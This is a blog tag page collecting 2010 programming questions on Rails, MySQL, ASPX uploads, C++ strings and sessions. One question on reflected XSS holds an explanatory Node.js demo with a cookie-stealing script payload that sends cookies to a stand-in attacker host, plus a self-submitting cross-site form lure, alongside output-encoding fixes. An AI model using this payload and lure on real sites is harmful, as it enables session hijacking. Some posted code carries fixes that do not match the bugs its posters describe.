Posts Tagged ‘email’

How can I have multiple forms to update the same model?

Monday, August 23rd, 2010

I am new to Rails.

I have a User model. I would like a web page that allows users to change their :name and :email, and another web page that allows them to change their password.

Right now, I have a form to edit :name and :email at

/users/1/edit

The form on the page is

<%= form_for(@user) do |f| %>

My routes.rb has

resources :users

This works. Users can edit their :name and :email just fine. How do I now set up another web page with another form that allows them to change their password?

Thank you.

What are the possible attack vectors for reflected cross site scripting?

Sunday, August 22nd, 2010

Wikipedia provides information about one of the most common scenarios for exploiting a reflected cross site scripting attack – using some degree of social engineering to induce unsuspecting users to click a malicious link:

  1. Alice often visits a particular website, which is hosted by Bob. Bob’s website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information.
  2. Mallory observes that Bob’s website contains a reflected XSS vulnerability.
  3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob’s website, but will contain Mallory’s malicious code, which the website will reflect.
  4. Alice visits the URL provided by Mallory while logged into Bob’s website.
  5. The malicious script embedded in the URL executes in Alice’s browser, as if it came directly from Bob’s server (this is the actual XSS vulnerability). The script can be used to send Alice’s session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice’s knowledge.

Now, this usually tends to be a very good example when the website happens to be a page-driven application – the vulnerability is exploited by getting the user to submit a malicious payload to the application (more importantly, by issuing a GET request when logged in) which is reflected back in the response.

Are there any more interesting attack vectors, especially ones to consider when the application utilizes a lot of AJAX with most of the requests being made over HTTP POST?

EDIT

In case I wasn’t clear, I’d like to know the various types of attack vectors applicable to reflected XSS attacks, especially when the client-side tier of the application is implemented differently. Page-based applications would have an attack vector involving HTTP GET requests issued from a user, but it would be interesting to know how this plays out for thick client applications, especially the ones using XMLHttpRequest objects that issue HTTP POST requests. Different mechanisms used in client-side rendering will obviously warrant study of different attack vectors. In some cases, there might not be any applicable attack vectors; the question is expressed to elicit such a response.
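As an added example (not part of the question or of any answer on this page), the following Node.js script shows why moving an application to POST requests does not by itself close the reflected vector from the Wikipedia scenario: instead of a link, Mallory hosts a page with a self-submitting cross-site form, which Alice's browser posts to Bob's endpoint with Alice's cookies and whose HTML response it renders as a top-level document. The host names (bob.example, mallory.example), the /search endpoint and the q parameter are assumptions; the handlers are plain functions over a parsed body and nothing here touches the network.

```javascript
// Escape for HTML text and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hypothetical POST /search handler on Bob's site that echoes the query
// straight into the page: the reflected XSS.
function searchHandlerVulnerable(body) {
  return `<h1>Results for ${body.q}</h1>`;
}

// Same handler with output encoding applied.
function searchHandlerFixed(body) {
  return `<h1>Results for ${escapeHtml(body.q)}</h1>`;
}

// The browser's encoding of a form submission (application/x-www-form-urlencoded)
// and Bob's server-side decoding of it. Any escaping on Mallory's page is undone
// by the browser before the value is sent, so Bob receives the raw payload.
function formBodyOf(fields) {
  return new URLSearchParams(fields).toString();
}
function parseFormBody(raw) {
  return Object.fromEntries(new URLSearchParams(raw));
}

// What Mallory hosts on her own origin instead of a link: a form that submits
// itself cross-site to Bob's POST endpoint. The browser renders Bob's HTML
// response as a top-level page, in Alice's session, exactly as in the GET case.
function attackerPage(targetUrl, fields) {
  const inputs = Object.entries(fields)
    .map(([n, v]) => `<input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}">`)
    .join('');
  return `<form id="f" method="POST" action="${escapeHtml(targetUrl)}">${inputs}</form>` +
         '<script>document.getElementById("f").submit()</script>';
}

// Crude check used below: does the response contain a script element?
function containsScript(html) {
  return /<script\b/i.test(html);
}

function demo() {
  // constructed cookie-stealing payload, as in step 5 of the scenario
  const payload = '<script>new Image().src="https://mallory.example/?c="+document.cookie</script>';
  const lure = attackerPage('https://bob.example/search', { q: payload });
  const wire = formBodyOf({ q: payload });     // what Alice's browser posts to Bob
  const body = parseFormBody(wire);            // what Bob's framework hands the handler
  return {
    lure,
    vulnerable: searchHandlerVulnerable(body),
    fixed: searchHandlerFixed(body),
  };
}

const r = demo();
console.log('vulnerable handler reflects script:', containsScript(r.vulnerable));
console.log('fixed handler reflects script:     ', containsScript(r.fixed));
```

What the cross-site form cannot do matters as much as what it can: it cannot set custom request headers and its Content-Type is limited to the form encodings, so an endpoint that requires an X-Requested-With header or a per-session anti-CSRF token is out of reach for this vector unless the token leaks, and a browser that applies SameSite=Lax to the session cookie will not attach it to the cross-site POST. When the response is JSON consumed by script rather than a rendered page, the remaining question is whether the client writes the reflected value into the DOM through innerHTML or an equivalent, which turns the same server bug into a DOM-side sink; encoding on output, as in the fixed handler, covers both cases.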

Optimize this query, retrieve users from a MySQL db with 500.000 users and one conditional

Sunday, August 22nd, 2010

Suppose I have the following MySQL database with 500,000 rows:

users
{
    id       - int,
    name     - varchar(32),
    verified - tinyint(1)
}

primary { id }
index   { verified }

And I need to get the last 20 unverified users, so I use the following query:

SELECT * FROM users WHERE verified != 1 ORDER BY id DESC LIMIT 20

But it takes 1.2 seconds to complete.

How can I optimize it? Or get the same result another way in PHP.

[EDIT]

ID is the primary index, VERIFIED is an index too

[EDIT 2]

CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL auto_increment COMMENT 'User identifier',
  `login` varchar(32) NOT NULL COMMENT 'Login used to sign in',
  `password` varchar(32) NOT NULL COMMENT 'Password used to sign in',
  `email` varchar(384) NOT NULL COMMENT 'User email',
  `group_id` int(10) unsigned default NULL,
  `display_name` varchar(64) NOT NULL COMMENT 'Display name',
  `email_verified` tinyint(3) unsigned default '0' COMMENT 'Email verified?',
  `banned` tinyint(3) unsigned default '0' COMMENT 'Banned?',
  `admin` tinyint(3) unsigned default '0' COMMENT 'Is a site super administrator?',
  `registered` int(10) unsigned NOT NULL COMMENT 'Registration date',
  PRIMARY KEY  (`id`),
  KEY `login` (`login`),
  KEY `password` (`password`),
  KEY `email` (`email`(333)),
  KEY `group_id` (`group_id`),
  KEY `email_verified` (`email_verified`),
  KEY `banned` (`banned`),
  KEY `admin` (`admin`),
  KEY `registered` (`registered`)
) ENGINE=MyISAM AUTO_INCREMENT=500002 DEFAULT CHARSET=utf8;

[EDIT 3]

EXPLAIN SELECT id FROM users WHERE email_verified != 1 ORDER BY id DESC LIMIT 20

is

id: 1
select_type: SIMPLE
table: users
type: range
possible_keys: email_verified
key: email_verified
key_len: 2
ref:
rows: 345195
Extra: Using where; Using filesort

And a profile of the query:

Status  Duration
(initialization)    0.0000307
Opening tables  0.000003
System lock 0.0000017
Table lock  0.0000042
init    0.000017
optimizing  0.0000077
statistics  0.000097
preparing   0.000054
executing   0.0000007
Sorting result  1.2321507
Sending data    0.000272
end 0.000004
query end   0.0000025
freeing items   0.0000099
closing tables  0.0000025
logging slow query  0.0000005

aspx file upload talking to c++ program does not work w/ binary files

Saturday, August 21st, 2010

Hi, I have a simple aspx C# script page that uploads a file and some addresses and sends an email with the uploaded file as an attachment. This all works fine from a browser, no problem, but that is not what I am trying to do :) .

I am using this control:

       <p> 
       Select File to Send: 
       <input id="File1" 
              type="file" 
              runat="server">
  

on the server part my script goes like this:

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Mail" %>
<%@ Import Namespace="System.Net.Mime" %>
<html>
 <head>
    <script language="C#" runat="server">
       void Button1_Click(object Source, EventArgs e)
       {
          if (FromAddr.Value == "")
          {
             Span1.InnerHtml = "Error: you must enter a Email Addr";
             return;
          }

          if (File1.PostedFile.FileName != "")
          {
            try
            {
              MailMessage aMessage = new MailMessage(FromAddr.Value, ToAddr.Value);
              aMessage.Subject = Subject.Value;
              aMessage.Body = Message.Value;
              // set up the attachment: the uploaded bytes are streamed straight
              // from the request into the MIME part, so binary content is fine here
              ContentType ct = new ContentType(MediaTypeNames.Application.Octet);
              Attachment data = new Attachment(File1.PostedFile.InputStream, ct);
              ContentDisposition disposition = data.ContentDisposition;
              disposition.FileName = AttachName.Value;
              aMessage.Attachments.Add(data);
              SmtpClient client = new SmtpClient("<some host>");
              client.Credentials = CredentialCache.DefaultNetworkCredentials;
              client.Send(aMessage);
              data.Dispose();
              Span1.InnerHtml = "Send Success: ";
            }
            catch (Exception exc)
            {
                // user input is HTML-encoded before it is written back into the page;
                // exc.ToString() is still echoed here for debugging, but in production
                // it belongs in a server-side log, not in the response
                Span1.InnerHtml = "<b>Send failure: " +
                                  HttpUtility.HtmlEncode(ToAddr.Value) + "</b><br>" + exc.ToString();
            }
          }
       }
    </script>
 </head>
 <body>
   <!-- enctype is what makes the browser send the file as multipart/form-data -->
   <form runat="server" enctype="multipart/form-data">
     From: <input id="FromAddr" type="text" runat="server"><br>
     To: <input id="ToAddr" type="text" runat="server"><br>
     Subject: <input id="Subject" type="text" runat="server"><br>
     Attachment name: <input id="AttachName" type="text" runat="server"><br>
     <textarea id="Message" runat="server"></textarea><br>
     Select File to Send: <input id="File1" type="file" runat="server"><br>
     <asp:Button id="Button1" runat="server" Text="Send" OnClick="Button1_Click" />
     <span id="Span1" runat="server"></span>
   </form>
 </body>
</html>

The rub is that I want to do this from within a C++ application, so I wrote a class to mimic the browser: it pulls down the HTTP GET page load, gets the validation ID and state codes and builds up a POST message. This works fine with text files, but as soon as I try binary it chokes.

It appears to time out waiting for a reply from the server as if it is expecting more data. Does anyone have any ideas? I have been banging my head against this wall for a bit. Thanks!

anqders on “Move users from E107 CMS to WordPress”

Saturday, August 21st, 2010

Hi Everyone

I currently have around 2200 users on my website running E107, but now I would like to move to WordPress, and it’s up and running on a new site.

...But as the topic says, I would like to take all my users with me, and I have found no scripts to do this for me, so I guess it must be done “manually”.

I have a SQL dump of the database, and can see that the E107 table name for the users is “ps3e107_user”, where I need to get “user_id”, “user_name”, “user_email” and maybe “user_password”?

What is the best way to accomplish this, and can someone provide me with a script of some sort, and a guide on how to use it?

garbage character at end of string?

Saturday, August 21st, 2010

Hi there, I’m reading a string, breaking up each word and sorting it into name, email and phone number, with the string joe bloggs joeblog@live.com 12345. But once I break everything down, the individual separated variables which hold the name, email and phone number have garbage characters at the end of them. I can’t figure out why.

test file

//test file
#include <iostream>
#include <string>
#include "iofunc.h"
using namespace std;
int main(){
    string str1 = "Colin Coghill commando C.Coghill@auckland.ac.nz 84536";

    iofunc func;
    cout<<"|-----------------------getname DEMONSTRATION------------------|\n" << endl;
    func.getName(str1);

    cout<<"the names are: " << func.glob_name << endl;

    cout<<"\n|-----------------------getphone DEMONSTRATION------------------|\n" << endl;
    func.getPhone(str1);
    cout<<"the phone number is:" << func.glob_phone << endl;

    cout<<"\n|-----------------------getemail DEMONSTRATION------------------|\n" << endl;
    func.getEmail(str1);
    cout<<"the email address is:" << func.glob_email << endl;

    return 0;
}

Here’s my getName function; the class is too big to scroll through :)

void iofunc::getName(string arg){
    lineProcess(arg);
    //make sure to call this depending on what function u are using

    int name_count = 0;
    int wspace_count = 0;
    int arg_len = arg.length();
    // Build the result in a std::string rather than a fixed char name_temp[80]:
    // that buffer was never zeroed or NUL-terminated, so string(name_temp) read
    // past the copied characters (the "garbage"), and an argument longer than
    // 79 characters would overflow it.
    string name_temp;

    name_count = numberofNames();
    //line process was called before so this will work,
    //make sure you call line process before using this function

    //for special, condition when there is no space in front of names
    if (special_condition == true){
        name_temp = arg;
        glob_name = name_temp;
    }

    if (special_condition == false){
        if (name_count == 1){
            int i = 0;
            while (i < arg_len && arg[i] != ' '){   // stop at end of string if there is no space
                name_temp += arg[i];
                i++;
            }
            glob_name = name_temp;
        }

        //for 2 names: copy up to (but not including) the 2nd space, then stop.
        //The old loop kept going after the 2nd space and resumed copying once the
        //3rd space was passed, leaving uninitialised bytes in the middle of the buffer.
        if (name_count == 2){
            for (int i = 0; i < arg_len; i++){
                if (arg[i] == ' '){
                    wspace_count++;
                    if (wspace_count == 2) break;
                }
                name_temp += arg[i];
            }
            glob_name = name_temp;
        }
        //for 3 names: same idea, stop at the 3rd space
        if (name_count == 3){
            for (int i = 0; i < arg_len; i++){
                if (arg[i] == ' '){
                    wspace_count++;
                    if (wspace_count == 3) break;
                }
                name_temp += arg[i];
            }
            glob_name = name_temp;
        }
    }

}

The basic gist of all that is: I’m using the function called lineProcess to figure out whether there is an email, phone and name in the argument string, and the numberofNames function gives how many names there are so that I can act accordingly.

I had to use char name_temp to copy just the names from the string so that I can extract just that and assign it to the string variable named glob_name. It copies everything I need, but it gives me that garbage after each extracted string.

Any idea?

regisfrey on “Blog Inaccessible from Global Dashboard”

Saturday, August 21st, 2010

My blog http://darkfirestudios.wordpress.com is old (and rarely logged into) but I keep it around to direct to the new blog/site. I just got an email with info on a spam comment ready for moderation but when I reach the dashboard the blog links are nowhere to be found. It acts as though I have no blogs and the links under “My Blog” just point to the dashboard. For default blog the value is N/A.

Passing SESSION variables

Saturday, August 21st, 2010

Let’s say I have a questionnaire consisting of three pages that a user is supposed to submit.
I collect variables through SESSION.
Should I pass all the variables in session from page to page repeating them or could I pass variables from page one to page three?
For example, I have ‘first name’ and ‘last name’ on page 1, ‘email’ and ‘address’ on page 2, ‘age’ and ‘occupation’ on page 3.
Could I pass ‘first name’ and ‘last name’ from page 1 directly to page 3?
Or I will have to pass them to page 2 first and then pass them again from page 2 to page 3?

Thank you!

Launch CMD File From ASPX Page

Saturday, August 21st, 2010

My organization uses a CMD file to install updated files for a major enterprise application. Currently, we send out an email to users with a link to the file and instructions to run it, BUT inevitably users don't update their machines until they're in the field and try to start the app.

We're now liking the idea of using an ASPX page to prompt the users to run the updates and to capture the fact that the updates have been run. I realize that we can't capture the success or failure of the update. But we'd like to capture that the user accessed the page.

Is it possible to embed into the markup for the page a link to the file on the local intranet that the users can click on to run the file?

The user accessing the page would capture that they did just that. We'd deal with whether or not the update was actually installed or if it failed later with them directly.